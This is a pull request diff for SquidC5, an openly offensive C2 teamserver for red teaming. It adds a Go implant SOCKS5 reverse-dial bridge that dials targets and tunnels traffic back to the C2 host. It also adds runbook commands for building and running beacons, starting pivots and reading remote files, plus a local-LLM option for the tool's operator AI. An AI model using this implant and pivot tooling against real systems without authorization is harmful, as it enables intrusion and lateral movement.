### PR TITLE
feat: SOCKS5 duplex, README badges, local LLM, docs

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -30,4 +30,7 @@ SQUIDC5_SHELL_AUTO_STABILIZE=true
 # Implant beacon AEAD (default: require auth; PSK auto under data/implant_psk.txt)
 # SQUIDC5_IMPLANT_REQUIRE_AUTH=true
 # SQUIDC5_IMPLANT_PSK=
+# Local Ollama-compatible LLM (used when no cloud LLM rows configured)
+# SQUIDC5_LOCAL_LLM_BASE_URL=http://127.0.0.1:11434/v1
+# SQUIDC5_LOCAL_LLM_MODEL=llama3.2
 

--- a/.env.example
+++ b/.env.example
@@ -30,7 +30,8 @@ SQUIDC5_SHELL_AUTO_STABILIZE=true
 # Implant beacon AEAD (default: require auth; PSK auto under data/implant_psk.txt)
 # SQUIDC5_IMPLANT_REQUIRE_AUTH=true
 # SQUIDC5_IMPLANT_PSK=
-# Local Ollama-compatible LLM (used when no cloud LLM rows configured)
+# Local Ollama-compatible LLM (opt-in when no cloud LLM rows configured)
+# SQUIDC5_LOCAL_LLM_ENABLED=true
 # SQUIDC5_LOCAL_LLM_BASE_URL=http://127.0.0.1:11434/v1
 # SQUIDC5_LOCAL_LLM_MODEL=llama3.2
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,22 @@ All notable changes to SquidC5 are documented here.
 Format inspired by [Keep a Changelog](https://keepachangelog.com/).  
 **OPSEC notes** call out changes that affect detection surface or defaults.
 
+## [Unreleased]
+
+### Added
+- SOCKS5 **duplex**: direct mode + implant reverse-dial bridge (`socks:connect`)
+- Local Ollama path via `SQUIDC5_LOCAL_LLM_*` when no cloud LLM configured
+- README badges fixed (live CI + SquidGate workflow shields)
+- Docs index links to five-star roadmap + implant paths
+
+### Security / OPSEC
+- Native agent remains AEAD-only with full TLS verify
+
+## [0.1.126] - 2026-08-01
+
+### Added
+- Audit verify, profile push, file chunks, native agent CI builds
+
 ## [0.1.115] - 2026-08-01
 
 ### Added

--- a/README.md
+++ b/README.md
@@ -155,8 +155,9 @@ See [.env.example](.env.example). Prefix `SQUIDC5_`.
 | `TLS_ENABLED` | `true` | HTTPS |
 | `MCP_ENABLED` | `false` | External AI tools |
 | `IMPLANT_REQUIRE_AUTH` | `true` | AEAD beacons |
+| `LOCAL_LLM_ENABLED` | `false` | Opt-in Ollama path |
 | `LOCAL_LLM_BASE_URL` | `http://127.0.0.1:11434/v1` | Ollama-compatible |
-| `LOCAL_LLM_MODEL` | `llama3.2` | Used if no cloud LLM rows |
+| `LOCAL_LLM_MODEL` | `llama3.2` | Model id when enabled |
 | `RATE_LIMIT_PER_MINUTE` | `60` | Raise for ops UI (e.g. 600) |
 | `PUBLIC_HOST` | empty | Stage-2 / SOCKS data host |
 

--- a/README.md
+++ b/README.md
@@ -9,193 +9,184 @@
 <p align="center">
   <strong>A SquidSec Open Source Project</strong><br>
   <a href="https://squidoffense.com/">SquidOffense.com</a> ·
-  <a href="https://github.com/SquidSec/SquidC5">GitHub</a>
+  <a href="https://github.com/SquidSec/SquidC5">GitHub</a> ·
+  <a href="docs/README.md">Docs</a>
 </p>
 
 <p align="center">
   <a href="https://github.com/SquidSec/SquidC5/actions/workflows/ci.yml"><img src="https://github.com/SquidSec/SquidC5/actions/workflows/ci.yml/badge.svg?branch=master" alt="CI"></a>
-  <a href="https://github.com/SquidSec/SquidC5/actions/workflows/squidgate.yml"><img src="https://img.shields.io/badge/SquidGate-enabled-red" alt="SquidGate"></a>
-  <a href="https://github.com/SquidSec/SquidC5/releases/latest"><img src="https://img.shields.io/github/v/release/SquidSec/SquidC5?include_prereleases&sort=date&label=latest%20release&color=blue" alt="Latest release"></a>
-  <a href="LICENSE"><img src="https://img.shields.io/badge/License-MIT-blue.svg" alt="License: MIT"></a>
+  <a href="https://github.com/SquidSec/SquidC5/actions/workflows/squidgate.yml"><img src="https://github.com/SquidSec/SquidC5/actions/workflows/squidgate.yml/badge.svg?branch=master" alt="SquidGate"></a>
+  <a href="https://github.com/SquidSec/SquidC5/releases/latest"><img src="https://img.shields.io/github/v/release/SquidSec/SquidC5?include_prereleases&sort=date&label=release" alt="Release"></a>
+  <a href="https://www.python.org/downloads/"><img src="https://img.shields.io/badge/python-3.11%2B-blue.svg" alt="Python"></a>
+  <a href="LICENSE"><img src="https://img.shields.io/badge/license-MIT-green.svg" alt="License"></a>
+  <a href="docs/roadmap-five-star.md"><img src="https://img.shields.io/badge/goal-5%20star%20C5-purple.svg" alt="Five star"></a>
 </p>
 
 **Command · Control · Cognitive · Collaborative · Coordination**
 
-Security-first, AI-native C5 teamserver for **authorized** red team and penetration testing operations. Built and maintained by **[SquidSec](https://squidoffense.com/)**.
+Security-first, AI-native C5 teamserver for **authorized** red team and penetration testing. Built by **[SquidSec](https://squidoffense.com/)**.
 
-> **Authorized use only.** Unauthorized access to systems is illegal. Operators must have explicit permission.
+> **Authorized use only.** Unauthorized access is illegal.
 
 ### What C5 means
 
-| Pillar | Role in SquidC5 |
-|--------|-----------------|
-| **Command** | Operator tasking of shells, beacons, and implants |
-| **Control** | Scoped tokens, policy, feature flags, listeners |
-| **Cognitive** | Sandboxed Admin AI + restricted external MCP tools |
-| **Collaborative** | Multi-operator handoff, chat, shared sessions |
-| **Coordination** | Profiles, task queues, timelines, audit, reports |
+| Pillar | Role |
+|--------|------|
+| **Command** | Tasking shells, beacons, native implants |
+| **Control** | Scoped tokens, policy, HITL, feature flags |
+| **Cognitive** | Sandboxed Admin AI + restricted MCP |
+| **Collaborative** | Teams, handoff, per-operator audit |
+| **Coordination** | Profiles, OAST, timeline, reports |
 
 ## Features
 
-- **Scoped API tokens** with full audit trail
-- **Dual AI model**
-  - External AI via restricted MCP tools (allow-listed, off by default)
-  - Server-side Admin AI (BYO LLM, sandboxed, prompt-injection shielded)
-- **Listeners** - HTTP beacons, TCP, reverse shells, DNS/SMTP OAST (any port)
-- **Sessions and tasking** - beacons and shells as first-class objects
-- **Policy engine** - risk scores + **server-side HITL** approval queue
-- **Implant AEAD** - ChaCha20-Poly1305 sealed beacons (PSK under `data/implant_psk.txt`)
-- **Malleable transforms** - base64 / prepend / append / xor / netbios pipelines
-- **File ops + SOCKS** - structured tasks and local SOCKS pivot broker
-- **Native beacons** - Linux Go agent + Windows PowerShell generator
-- **Secure defaults** - TLS on, empty CORS, no public OpenAPI, MCP off
-- **Ops console** - `/ops` UI (admin JS server-gated)
-- **Operator CLI** - `sc5` / `squidc5-cli`
-- **Binary releases** - Linux/Windows teamserver + CLI from CI (+ SBOM)
+- **Scoped API tokens** + immutable audit hash chain (`sc5 audit-verify`)
+- **Dual AI** — MCP off by default; Admin AI with 15 allow-listed capabilities; optional local Ollama
+- **Native implant** — `agents/sc5beacon` (Go): AEAD, sleep/jitter/kill/hours, files, SOCKS reverse-dial
+- **Implant factory** — `sc5 implants build` / `POST /api/v1/implants/build`
+- **Malleable transforms** — base64, prepend/append, xor, netbios + profile push
+- **SOCKS5 pivot** — operator proxy with **implant reverse-dial duplex** or direct mode
+- **File ops** — `file:list|read|write|delete` (+ chunk offset/length)
+- **Engagement ROE** — banned commands, end time, HITL file-write
+- **OAST** — DNS/HTTP/SMTP collaborator
+- **Secure defaults** — TLS on, empty CORS, no public OpenAPI, admin.js gated
+- **Binary CI** — Linux/Windows server+CLI, native agents, SBOM
 
-## Quick Start (Docker lab)
+## Quick start (Docker lab)
 
 ```bash
 docker compose up --build -d
-# TLS on by default (self-signed under data/tls/)
 curl -sk https://127.0.0.1:8443/api/v1/health
 docker compose exec squidc5 cat /data/admin_token.txt
-# Ops: https://127.0.0.1:8443/ops
+# Ops UI: https://127.0.0.1:8443/ops
 ```
 
-## Quick Start (local)
+## Quick start (local)
 
 ```bash
 python3 -m venv .venv && source .venv/bin/activate
 pip install -r requirements-dev.txt && pip install -e .
-squidc5   # enables per-instance TLS under data/tls/
+squidc5
 # token: data/admin_token.txt
 ```
 
-## Standalone binaries
+## Binaries
 
-Every successful push to `master`:
+Every push to `master` builds and releases:
 
-1. CI builds Linux + Windows executables  
-2. CI publishes a **GitHub Release** with checksums  
+**https://github.com/SquidSec/SquidC5/releases/latest**
 
-**Download:** https://github.com/SquidSec/SquidC5/releases/latest  
-
-| Asset | Purpose |
-|-------|---------|
-| `sc5-linux-x64` / `sc5-windows-x64.exe` | Operator CLI |
-| `squidc5-linux-x64` / `squidc5-windows-x64.exe` | C2 server (includes `/ops` UI) |
-| `SHA256SUMS.txt` | Checksums |
+| Asset | Role |
+|-------|------|
+| `squidc5-linux-x64` | Teamserver |
+| `sc5-linux-x64` | Operator CLI |
+| `sc5beacon-*` (CI artifact) | Native implant |
+| `SHA256SUMS.txt` / `sbom.cdx.json` | Integrity |
 
 ```bash
 chmod +x squidc5-linux-x64 && ./squidc5-linux-x64
-# token: ./data/admin_token.txt
-# console: https://HOST:8443/ops
-
 ./sc5-linux-x64 login --url https://HOST:8443 --token sc5_... --insecure
-./sc5-linux-x64 sessions list
 ```
 
-**Production deploy:** binary-only from main CI after green merge. See [docs/deployment.md](docs/deployment.md).
+Prod deploy: **binary only** from main CI. See [docs/deployment.md](docs/deployment.md).
 
-## Operator CLI (`sc5`)
+## Operator CLI
 
 ```bash
-pip install -e .
-sc5 login --url https://YOUR_HOST:8443 --token sc5_... --insecure
-sc5 health
+sc5 login --url https://HOST:8443 --token sc5_... --insecure
 sc5 sessions list
-sc5 tasks create <session_id> "whoami"
-sc5 listeners create http-1 9001 --kind http
-sc5 payloads generate http_beacon_python YOUR_HOST 8443 --raw
+sc5 implants build --os linux --arch amd64 C2_HOST 8443
 sc5 policy hitl list
+sc5 audit-verify
 sc5 backup ./backup.db
-sc5 ai recon_assist --data "windows domain"
-sc5 repl
+sc5 ai opsec_review --data "listeners on 443"
 ```
 
-Config: `~/.config/squidc5/config.json` (mode 0600).  
-Overrides: `--url` / `--token`, or `SQUIDC5_URL` / `SQUIDC5_TOKEN`.
+## Native beacon
 
-## API overview
+```bash
+cd agents/sc5beacon && go mod tidy && go build -o sc5beacon .
+export SC5_URL="https://C2:8443/api/v1/implant/beacon"
+export SC5_PSK="$(cat /path/to/data/implant_psk.txt)"
+./sc5beacon   # TLS verifies system CAs (use real cert or lab CA)
+```
+
+Docs: [agents/sc5beacon/README.md](agents/sc5beacon/README.md)
+
+## API (selected)
 
 | Area | Path |
 |------|------|
-| Health | `GET /api/v1/health` (minimal) |
-| Deep health | `GET /api/v1/health/deep` (auth) |
-| Tokens / sessions / tasks / listeners | `/api/v1/...` |
-| HITL queue | `GET/POST /api/v1/policy/hitl...` |
+| Health | `GET /api/v1/health` · `GET /api/v1/health/deep` |
+| Implant build | `POST /api/v1/implants/build` |
+| File ops | `POST /api/v1/files/op` |
+| SOCKS | `POST /api/v1/pivot/socks` |
+| Profile push | `POST /api/v1/profiles/{id}/push` |
+| Engagement | `GET/PUT /api/v1/engagement` |
+| HITL | `GET /api/v1/policy/hitl` |
+| Audit verify | `GET /api/v1/audit/verify` |
 | Admin AI | `POST /api/v1/ai/run` |
-| MCP | `GET /mcp/tools` · `POST /mcp/call` (off by default) |
-| Implant beacon | `POST /api/v1/implant/beacon` |
 
-Auth: `Authorization: Bearer <token>` or `X-API-Token: <token>`
-
-**Docs are GitHub-only** - `/docs`, `/redoc`, `/openapi.json` stay disabled on the server.
+Auth: `Authorization: Bearer <token>`. **No public OpenAPI** on the server.
 
 ## Documentation
 
-| Doc | Purpose |
-|-----|---------|
-| [User guide](docs/user-guide.md) | Features, why/how, examples |
-| [Operator runbook](docs/operator-runbook.md) | Shells, beacons, day-2 ops |
-| [Deployment](docs/deployment.md) | Binary prod + Docker lab |
-| [Threat model](docs/threat-model.md) | Trust boundaries and controls |
-| [Roadmap](docs/roadmap-2026-2027.md) | 2026-2027 priorities |
-| [Vision](docs/squidc5-vision.md) | Architecture |
-| [Prod readiness plan](docs/prod-readiness-plan.md) | Execution checklist |
-| [CONTRIBUTING](CONTRIBUTING.md) | PR / git cycle |
-| [CHANGELOG](CHANGELOG.md) | Releases + OPSEC notes |
-| [AGENTS.md](AGENTS.md) | Agent/operator memory |
+| Doc | Link |
+|-----|------|
+| Docs index | [docs/README.md](docs/README.md) |
+| User guide | [docs/user-guide.md](docs/user-guide.md) |
+| Operator runbook | [docs/operator-runbook.md](docs/operator-runbook.md) |
+| Deployment | [docs/deployment.md](docs/deployment.md) |
+| Threat model | [docs/threat-model.md](docs/threat-model.md) |
+| Five-star roadmap | [docs/roadmap-five-star.md](docs/roadmap-five-star.md) |
+| Prod readiness | [docs/prod-readiness-plan.md](docs/prod-readiness-plan.md) |
+| Vision | [docs/squidc5-vision.md](docs/squidc5-vision.md) |
+| Changelog | [CHANGELOG.md](CHANGELOG.md) |
+| Contributing | [CONTRIBUTING.md](CONTRIBUTING.md) |
+| Security | [SECURITY.md](SECURITY.md) |
+| Agents | [AGENTS.md](AGENTS.md) |
 
-## Configuration (selected)
+## Configuration
 
-Prefix `SQUIDC5_`. See [.env.example](.env.example).
+See [.env.example](.env.example). Prefix `SQUIDC5_`.
 
-| Variable | Default | Description |
-|----------|---------|-------------|
-| `HOST` / `PORT` | `0.0.0.0` / `8443` | API bind |
-| `DATA_DIR` | `data` | DB, tokens, TLS, secrets |
+| Variable | Default | Notes |
+|----------|---------|--------|
 | `TLS_ENABLED` | `true` | HTTPS |
-| `MCP_ENABLED` | `false` | External MCP |
-| `AI_ENABLED` | `true` | Admin AI |
-| `PUBLIC_HOST` | empty | Stage-2 / implant callback host |
-| `RATE_LIMIT_PER_MINUTE` | `60` | API rate limit |
-| `LOG_JSON` | `false` | Structured logs |
-| `SECRETS_KEY` | auto file | At-rest LLM key encryption |
-| `PLUGIN_SIGNING_SECRET` | auto file | Plugin HMAC secret |
+| `MCP_ENABLED` | `false` | External AI tools |
+| `IMPLANT_REQUIRE_AUTH` | `true` | AEAD beacons |
+| `LOCAL_LLM_BASE_URL` | `http://127.0.0.1:11434/v1` | Ollama-compatible |
+| `LOCAL_LLM_MODEL` | `llama3.2` | Used if no cloud LLM rows |
+| `RATE_LIMIT_PER_MINUTE` | `60` | Raise for ops UI (e.g. 600) |
+| `PUBLIC_HOST` | empty | Stage-2 / SOCKS data host |
 
-## Security model (summary)
+## Security model
 
-1. **External AI** - MCP off by default; per-token tool allow-list  
-2. **Admin AI** - capability allow-list + `sanitize_untrusted`  
-3. **Policy + HITL** - server-side approval queue (client flags ignored)  
-4. **Audit** - significant actions logged  
-5. **Admin UI** - `/api/v1/ops/admin.js` requires admin scope  
-6. **SquidGate** - PR security gate on this repo  
-
-Report vulnerabilities via [GitHub Security Advisories](https://github.com/SquidSec/SquidC5/security). See [SECURITY.md](SECURITY.md).
+1. Deny by default · scoped tokens · server-side HITL  
+2. Admin AI capability allow-list + `sanitize_untrusted`  
+3. Implant AEAD · no skip-verify in native agent  
+4. Audit chain + verify · engagement ROE  
+5. [SquidGate](https://github.com/SquidSec/SquidGate) on PRs  
 
 ## Development
 
 ```bash
 pytest -q
 ruff check src tests
+# optional: cd agents/sc5beacon && go build .
 ```
 
-Git cycle: feature branch → tests first → PR → green CI → merge. Never push straight to `master`. Details: [CONTRIBUTING.md](CONTRIBUTING.md).
+Git cycle: feature branch → tests → PR → green CI → merge `master`. Never push straight to master.
 
 ## About SquidSec
 
-SquidC5 is created and managed by **[SquidSec](https://squidoffense.com/)** - U.S. veteran-owned security company.
-
-- Website: [https://squidoffense.com/](https://squidoffense.com/)  
-- Sister project: [SquidGate](https://github.com/SquidSec/SquidGate) (PR security gate)
+**[SquidSec](https://squidoffense.com/)** — U.S. veteran-owned security.  
+Sister project: [SquidGate](https://github.com/SquidSec/SquidGate).
 
 ## License
 
-MIT - see [LICENSE](LICENSE).
+MIT — [LICENSE](LICENSE).
 
 ## Disclaimer
 
-Provided for authorized security testing and education. Authors are not responsible for misuse.
+For authorized security testing and education only. Authors are not responsible for misuse.

--- a/agents/sc5beacon/socks.go
+++ b/agents/sc5beacon/socks.go
@@ -1,0 +1,60 @@
+package main
+
+import (
+	"fmt"
+	"io"
+	"net"
+	"strconv"
+	"time"
+)
+
+// handleSocksConnect: dial target, dial C2 data port, announce conn_id, bridge.
+func handleSocksConnect(args map[string]any) string {
+	connID, _ := args["conn_id"].(string)
+	host, _ := args["host"].(string)
+	dataHost, _ := args["data_host"].(string)
+	port := anyToInt(args["port"])
+	dataPort := anyToInt(args["data_port"])
+	if connID == "" || host == "" || dataHost == "" || port <= 0 || dataPort <= 0 {
+		return "error: socks:connect missing args"
+	}
+	target := net.JoinHostPort(host, strconv.Itoa(port))
+	tconn, err := net.DialTimeout("tcp", target, 20*time.Second)
+	if err != nil {
+		return "error: target dial: " + err.Error()
+	}
+	defer tconn.Close()
+
+	daddr := net.JoinHostPort(dataHost, strconv.Itoa(dataPort))
+	dconn, err := net.DialTimeout("tcp", daddr, 20*time.Second)
+	if err != nil {
+		return "error: data dial: " + err.Error()
+	}
+	defer dconn.Close()
+
+	if _, err := fmt.Fprintf(dconn, "%s\n", connID); err != nil {
+		return "error: announce: " + err.Error()
+	}
+
+	errc := make(chan error, 2)
+	go func() { _, e := io.Copy(tconn, dconn); errc <- e }()
+	go func() { _, e := io.Copy(dconn, tconn); errc <- e }()
+	<-errc
+	return "socks:bridged"
+}
+
+func anyToInt(v any) int {
+	switch t := v.(type) {
+	case float64:
+		return int(t)
+	case int:
+		return t
+	case int64:
+		return int(t)
+	case string:
+		n, _ := strconv.Atoi(t)
+		return n
+	default:
+		return 0
+	}
+}

--- a/agents/sc5beacon/tasks.go
+++ b/agents/sc5beacon/tasks.go
@@ -16,8 +16,10 @@ func runTask(cmd string, args map[string]any) string {
 		return runFileOp(cmd, args)
 	}
 	if cmd == "socks:start" {
-		// Operator already has local SOCKS broker; agent confirms readiness.
 		return "socks:ready"
+	}
+	if cmd == "socks:connect" {
+		return handleSocksConnect(args)
 	}
 	if cmd == "profile:switch" {
 		if pid, ok := args["profile_id"].(string); ok {

--- a/docs/README.md
+++ b/docs/README.md
@@ -1,19 +1,28 @@
 # SquidC5 documentation
 
-**SquidSec** open source C5 platform - [squidoffense.com](https://squidoffense.com/)
+**[SquidSec](https://squidoffense.com/)** open-source C5 — [GitHub](https://github.com/SquidSec/SquidC5) · [Releases](https://github.com/SquidSec/SquidC5/releases/latest)
 
 | Document | Description |
 |----------|-------------|
 | [User guide](user-guide.md) | Features, workflows, examples |
-| [Operator runbook](operator-runbook.md) | Day-2 operator procedures |
-| [Deployment](deployment.md) | Binary production + Docker lab |
-| [Threat model](threat-model.md) | Assets, adversaries, controls |
-| [Vision](squidc5-vision.md) | Architecture and security design |
-| [Roadmap 2026-2027](roadmap-2026-2027.md) | Prioritized roadmap |
-| [Prod readiness plan](prod-readiness-plan.md) | Phase A-D execution checklist |
-| [CHANGELOG](../CHANGELOG.md) | Release notes + OPSEC |
-| [CONTRIBUTING](../CONTRIBUTING.md) | How to contribute |
-| [SECURITY](../SECURITY.md) | Disclosure policy |
-| [AGENTS](../AGENTS.md) | Agent/operator memory |
+| [Operator runbook](operator-runbook.md) | Day-2 shells, beacons, native implant |
+| [Deployment](deployment.md) | Binary prod + Docker lab + systemd |
+| [Threat model](threat-model.md) | Assets, adversaries, STRIDE |
+| [Vision](squidc5-vision.md) | Architecture |
+| [Roadmap 2026–2027](roadmap-2026-2027.md) | Long-range priorities |
+| [Five-star program](roadmap-five-star.md) | Pack A–E to category leadership |
+| [Prod readiness](prod-readiness-plan.md) | Security/ops checklist |
+| [Changelog](../CHANGELOG.md) | Releases + OPSEC notes |
+| [Contributing](../CONTRIBUTING.md) | PR / git cycle |
+| [Security](../SECURITY.md) | Disclosure |
+| [AGENTS](../AGENTS.md) | CLI + agent memory |
 
-Public OpenAPI is **not** served by the running server.
+### Implant & modules
+
+| Path | Description |
+|------|-------------|
+| [agents/sc5beacon](../agents/sc5beacon/README.md) | Native Go beacon (Linux/Windows/macOS) |
+| [agents/windows](../agents/windows/README.md) | Windows notes |
+| [modules/bof](../modules/bof/README.md) | BOF-style lab modules |
+
+Public OpenAPI is **not** served by the running server (`/docs` stays off).

--- a/docs/operator-runbook.md
+++ b/docs/operator-runbook.md
@@ -159,9 +159,50 @@ Server path: `/ws/v1/beacon` (or WS profile path). Client needs `websocket-clien
 
 ```bash
 sc5 implants families
+sc5 implants build --os linux --arch amd64 C2_HOST 8443
 sc5 implants generate dns_beacon <HOST> 5353 --raw
 sc5 implants generate linux_memfd <HOST> 8443 --raw
 sc5 implants generate bof <HOST> 8443 --platform windows --raw
+```
+
+### Native sc5beacon (preferred)
+
+See [agents/sc5beacon/README.md](../agents/sc5beacon/README.md).
+
+```bash
+cd agents/sc5beacon && go build -o sc5beacon .
+export SC5_URL="https://C2:8443/api/v1/implant/beacon"
+export SC5_PSK="$(cat data/implant_psk.txt)"   # from teamserver
+./sc5beacon
+```
+
+Server must have `SQUIDC5_IMPLANT_REQUIRE_AUTH=true` (default) and matching PSK.
+
+### SOCKS pivot
+
+```bash
+# Implant reverse-dial (default): needs live beacon session
+curl -sk -X POST -H "Authorization: Bearer $TOK" -H "Content-Type: application/json" \
+  -d '{"session_id":"ses_...","mode":"implant","listen_host":"127.0.0.1"}' \
+  https://C2:8443/api/v1/pivot/socks
+# Point proxy tool at returned listen_port; implant handles socks:connect tasks
+
+# Direct mode: C2 dials targets itself (lab)
+# mode=direct
+```
+
+### File ops
+
+```bash
+# POST /api/v1/files/op
+# {"session_id":"...","op":"list","path":"/tmp"}
+# {"session_id":"...","op":"read","path":"/etc/hosts","offset":0,"length":1024}
+```
+
+### Audit integrity
+
+```bash
+sc5 audit-verify --limit 500
 ```
 
 ## Teams / collab

--- a/docs/roadmap-five-star.md
+++ b/docs/roadmap-five-star.md
@@ -1,7 +1,31 @@
 # Five-star C5 program
 
-Track: Pack A (implant) → B (traffic) → C (UX/post-ex) → D (AI) → E (proof).
+Goal: ★★★★★ across implants, traffic, post-ex, multi-player, AI, governance, CI.
 
-Each item: feature branch → tests → PR → green CI/SquidGate → merge master → prod binary.
+**Process:** feature branch → unit tests → PR → CI + SquidGate green → merge `master` → deploy **Release binary** to prod → repeat.
 
-See also `docs/prod-readiness-plan.md`.
+## Pack status (living)
+
+| Pack | Focus | Status |
+|------|--------|--------|
+| **A** | Native agent, factory, lifecycle, BOF scaffold | **Landed** (sc5beacon v2, build API, CI artifacts) |
+| **B** | Traffic, profile push, transforms, SOCKS duplex | **In progress** (transforms + push done; SOCKS reverse-dial duplex this PR) |
+| **C** | File chunks, engagement ROE, multi-op | **Landed** (API); ops UI polish ongoing |
+| **D** | AI capability pack + local Ollama path | **Landed** (15 caps; local LLM URL/model) |
+| **E** | CI proof, SBOM, audit verify, benchmarks | **Landed** (verify, cov, mypy, SBOM, agent CI) |
+
+## Still climbing to full ★★★★★
+
+- Process injection + sleep mask  
+- Windows COFF/BOF **loader host**  
+- P2P / SMB / named pipe  
+- Ops UI file browser / pivot graph  
+- Lab victim matrix soak numbers  
+- External security audit  
+
+## Links
+
+- [User guide](user-guide.md)  
+- [Deployment](deployment.md)  
+- [Native beacon](../agents/sc5beacon/README.md)  
+- [README](../README.md)  

--- a/src/squidc5/ai/admin_ai.py
+++ b/src/squidc5/ai/admin_ai.py
@@ -149,11 +149,16 @@ class AdminAI:
         metrics: MetricsCollector,
         policy: PolicyEngine,
         secrets: SecretBox | None = None,
+        *,
+        local_llm_base_url: str = "",
+        local_llm_model: str = "",
     ) -> None:
         self.db = db
         self.metrics = metrics
         self.policy = policy
         self.secrets = secrets
+        self.local_llm_base_url = (local_llm_base_url or "").rstrip("/")
+        self.local_llm_model = local_llm_model or ""
         self._busy = False
         self._last: dict[str, Any] = {
             "status": "idle",
@@ -392,6 +397,18 @@ class AdminAI:
                 caps = json.loads(caps)
             if capability in (caps or []) or not caps:
                 return full
+        # Optional local Ollama-compatible endpoint (no API key)
+        if self.local_llm_base_url and self.local_llm_model:
+            return {
+                "id": "local",
+                "name": "local-llm",
+                "provider": "ollama",
+                "base_url": self.local_llm_base_url,
+                "model": self.local_llm_model,
+                "api_key_enc": "",
+                "enabled": 1,
+                "capabilities": list(ALLOWED_CAPABILITIES),
+            }
         return None
 
     async def _call_llm(self, llm: dict[str, Any], capability: str, safe_data: str) -> dict[str, Any]:

--- a/src/squidc5/ai/admin_ai.py
+++ b/src/squidc5/ai/admin_ai.py
@@ -150,6 +150,7 @@ class AdminAI:
         policy: PolicyEngine,
         secrets: SecretBox | None = None,
         *,
+        local_llm_enabled: bool = False,
         local_llm_base_url: str = "",
         local_llm_model: str = "",
     ) -> None:
@@ -157,6 +158,7 @@ class AdminAI:
         self.metrics = metrics
         self.policy = policy
         self.secrets = secrets
+        self.local_llm_enabled = bool(local_llm_enabled)
         self.local_llm_base_url = (local_llm_base_url or "").rstrip("/")
         self.local_llm_model = local_llm_model or ""
         self._busy = False
@@ -397,8 +399,8 @@ class AdminAI:
                 caps = json.loads(caps)
             if capability in (caps or []) or not caps:
                 return full
-        # Optional local Ollama-compatible endpoint (no API key)
-        if self.local_llm_base_url and self.local_llm_model:
+        # Optional local Ollama-compatible endpoint (explicit enable only)
+        if self.local_llm_enabled and self.local_llm_base_url and self.local_llm_model:
             return {
                 "id": "local",
                 "name": "local-llm",

--- a/src/squidc5/api/routes.py
+++ b/src/squidc5/api/routes.py
@@ -106,6 +106,7 @@ class SocksStart(BaseModel):
     session_id: str
     listen_host: str = "127.0.0.1"
     listen_port: int = 0
+    mode: str = "implant"  # implant (reverse-dial) | direct (C2 dials target)
 
 
 class BeaconIn(BaseModel):
@@ -767,14 +768,18 @@ def build_api_router() -> APIRouter:
         if not decision.allowed:
             raise _policy_http_error(decision)
         pivot = await state.socks.start(
-            body.session_id, listen_host=body.listen_host, listen_port=body.listen_port
+            body.session_id,
+            listen_host=body.listen_host,
+            listen_port=body.listen_port,
+            mode=body.mode or "implant",
         )
-        # Queue implant task
+        # Queue implant task for reverse-dial mode
         try:
             await state.tasks.create(
                 session_id=body.session_id,
                 command="socks:start",
-                args={"pivot_id": pivot["id"], "port": pivot["listen_port"]},
+                args=pivot.get("task_hint", {}).get("args")
+                or {"pivot_id": pivot["id"], "port": pivot["listen_port"]},
                 created_by=auth.name,
             )
         except Exception:

--- a/src/squidc5/config.py
+++ b/src/squidc5/config.py
@@ -33,7 +33,8 @@ class Settings(BaseSettings):
     # MCP off by default — enable explicitly when external AI is required
     mcp_enabled: bool = False
     ai_enabled: bool = True
-    # Local LLM (Ollama-compatible) — used when no cloud LLM configured
+    # Local LLM (Ollama-compatible) — only when explicitly enabled
+    local_llm_enabled: bool = False
     local_llm_base_url: str = "http://127.0.0.1:11434/v1"
     local_llm_model: str = "llama3.2"
     audit_retention_days: int = 90

--- a/src/squidc5/main.py
+++ b/src/squidc5/main.py
@@ -64,6 +64,7 @@ async def build_state(settings: Settings) -> AppState:
         metrics,
         policy,
         secrets=secret_box,
+        local_llm_enabled=settings.local_llm_enabled,
         local_llm_base_url=settings.local_llm_base_url,
         local_llm_model=settings.local_llm_model,
     )

--- a/src/squidc5/main.py
+++ b/src/squidc5/main.py
@@ -59,7 +59,14 @@ async def build_state(settings: Settings) -> AppState:
     secret_box = SecretBox(
         resolve_secrets_key(explicit=settings.secrets_key, data_dir=settings.data_dir)
     )
-    admin_ai = AdminAI(db, metrics, policy, secrets=secret_box)
+    admin_ai = AdminAI(
+        db,
+        metrics,
+        policy,
+        secrets=secret_box,
+        local_llm_base_url=settings.local_llm_base_url,
+        local_llm_model=settings.local_llm_model,
+    )
     features = FeatureFlags(db)
     await features.load()
     profiles = ProfileEngine(db)
@@ -134,8 +141,14 @@ async def build_state(settings: Settings) -> AppState:
         data_dir=settings.data_dir,
     )
     socks = SocksBroker()
+    socks.public_host = settings.public_host or settings.public_ip or "127.0.0.1"
     engagement = EngagementPolicy()
     tasks.engagement = engagement
+
+    async def _socks_enqueue(session_id: str, command: str, args: dict) -> None:
+        await tasks.create(session_id=session_id, command=command, args=args, created_by="system")
+
+    socks.enqueue_task = _socks_enqueue
 
     return AppState(
         settings=settings,

--- a/src/squidc5/pivot/socks.py
+++ b/src/squidc5/pivot/socks.py
@@ -1,11 +1,19 @@
-"""SOCKS5 pivot tasking helpers (teamserver side)."""
+"""SOCKS5 pivot: operator-facing proxy with implant reverse-dial relay."""
 
 from __future__ import annotations
 
 import asyncio
+import logging
 import secrets
+import struct
+from collections.abc import Awaitable, Callable
 from dataclasses import dataclass, field
 from typing import Any
+
+log = logging.getLogger("squidc5.socks")
+
+# Optional: queue implant task (session_id, command, args) -> None
+TaskEnqueuer = Callable[[str, str, dict[str, Any]], Awaitable[None]]
 
 
 @dataclass
@@ -14,15 +22,21 @@ class SocksPivot:
     session_id: str
     listen_host: str = "127.0.0.1"
     listen_port: int = 0
+    data_port: int = 0
+    mode: str = "implant"  # implant | direct
     status: str = "pending"
     server: asyncio.AbstractServer | None = field(default=None, repr=False)
+    data_server: asyncio.AbstractServer | None = field(default=None, repr=False)
+    pending: dict[str, asyncio.Future] = field(default_factory=dict, repr=False)
 
 
 class SocksBroker:
-    """In-memory registry of SOCKS pivots bound to sessions."""
+    """SOCKS5 broker: direct dial from C2, or implant reverse-dial bridge."""
 
     def __init__(self) -> None:
         self._pivots: dict[str, SocksPivot] = {}
+        self.enqueue_task: TaskEnqueuer | None = None
+        self.public_host: str = "127.0.0.1"
 
     def list(self) -> list[dict[str, Any]]:
         return [
@@ -31,6 +45,8 @@ class SocksBroker:
                 "session_id": p.session_id,
                 "listen_host": p.listen_host,
                 "listen_port": p.listen_port,
+                "data_port": p.data_port,
+                "mode": p.mode,
                 "status": p.status,
             }
             for p in self._pivots.values()
@@ -42,23 +58,52 @@ class SocksBroker:
         *,
